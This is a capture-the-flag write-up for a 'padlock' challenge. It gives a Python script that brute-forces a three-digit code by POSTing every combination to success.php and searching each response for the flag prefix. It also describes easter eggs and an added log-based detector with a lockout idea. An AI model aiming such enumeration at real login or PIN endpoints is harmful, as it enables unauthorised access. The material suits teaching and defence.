# CHALLENGE padlock

## Writeup

To get the flag, a 3-digit code has to be found. As 3 digits only offer 999 combinations, brute force is the way to go.

In the source code of `index.php`, we can see that each try sends a POST request to `success.php`. The POST request contains 3 values: `try100`, `try10` and `try1`. In the brute force, we have to enumerate each value from 0 to 9.

We can check each response for the flag by looking for `IG{`. If we get a match, the response might contain a flag.

A simple brute-force program in Python would look like this:

```python
import requests

# Change this to the full URL of success.php on the challenge host
url = "success.php"


def checkForSolution(text):
    # Look for the flag prefix in the response body
    start = text.find("IG{")
    if start == -1:
        return False
    # Print everything from "IG{" up to and including the closing brace
    print(text[start:text.find("}", start) + 1])
    return True


def bruteForce():
    # Enumerate the hundreds, tens and units digits
    for h in range(10):
        for t in range(10):
            for u in range(10):
                param = {'try100': h, 'try10': t, 'try1': u}
                req = requests.post(url, data=param)
                print("try:", h, t, u)
                if checkForSolution(req.text):
                    return True
    return False


bruteForce()
```

## Easter eggs

In `robots.txt`, a file `flag.txt` is disallowed; this file contains ASCII art of a beautiful flag.

Trying combinations like '420' or '069' will redirect to a new page. A cookie is also placed; as long as this cookie exists, the index page shows a 4-digit combination. However, this newly added digit does not do anything. The cookie contains a Base64 string.
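
Seen from the server, the brute force in the writeup is one client submitting many distinct `try100`/`try10`/`try1` combinations in a short time. The following is an added example, not part of the original writeup or the challenge's code: it flags such clients from an application log whose line format, window length and threshold are assumptions, and the sample lines are constructed.

```python
from collections import defaultdict, deque

WINDOW_SECONDS = 60      # assumed sliding-window length
MAX_DISTINCT_CODES = 5   # assumed limit of distinct codes per client per window


def parse_line(line):
    """Parse an assumed log format: '<epoch> <client> try100=<d> try10=<d> try1=<d>'."""
    ts, client, *fields = line.split()
    digits = dict(f.split("=", 1) for f in fields)
    code = digits["try100"] + digits["try10"] + digits["try1"]
    return int(ts), client, code


def find_enumerators(lines, window=WINDOW_SECONDS, limit=MAX_DISTINCT_CODES):
    """Return {client: timestamp at which it first exceeded `limit` distinct codes in `window` s}."""
    recent = defaultdict(deque)   # client -> (ts, code) pairs still inside the window
    flagged = {}
    for ts, client, code in sorted(map(parse_line, lines)):
        q = recent[client]
        q.append((ts, code))
        # Drop attempts that have aged out of the sliding window
        while q and q[0][0] <= ts - window:
            q.popleft()
        # Repeating the same guess is not enumeration, so count distinct codes
        if client not in flagged and len({c for _, c in q}) > limit:
            flagged[client] = ts
    return flagged


# Constructed sample: 10.0.0.7 walks 000..011 at one try per second,
# 10.0.0.9 makes three guesses using two different codes.
SAMPLE = [f"{1700000000 + i} 10.0.0.7 try100=0 try10={i // 10} try1={i % 10}"
          for i in range(12)]
SAMPLE += [
    "1700000003 10.0.0.9 try100=1 try10=2 try1=3",
    "1700000030 10.0.0.9 try100=1 try10=2 try1=3",
    "1700000050 10.0.0.9 try100=4 try10=5 try1=6",
]

if __name__ == "__main__":
    for client, ts in find_enumerators(SAMPLE).items():
        print(f"{client} exceeded {MAX_DISTINCT_CODES} distinct codes in {WINDOW_SECONDS}s at {ts}")
```

The same counter can back a server-side lockout in `success.php`, so that a client is refused further tries once it crosses the limit.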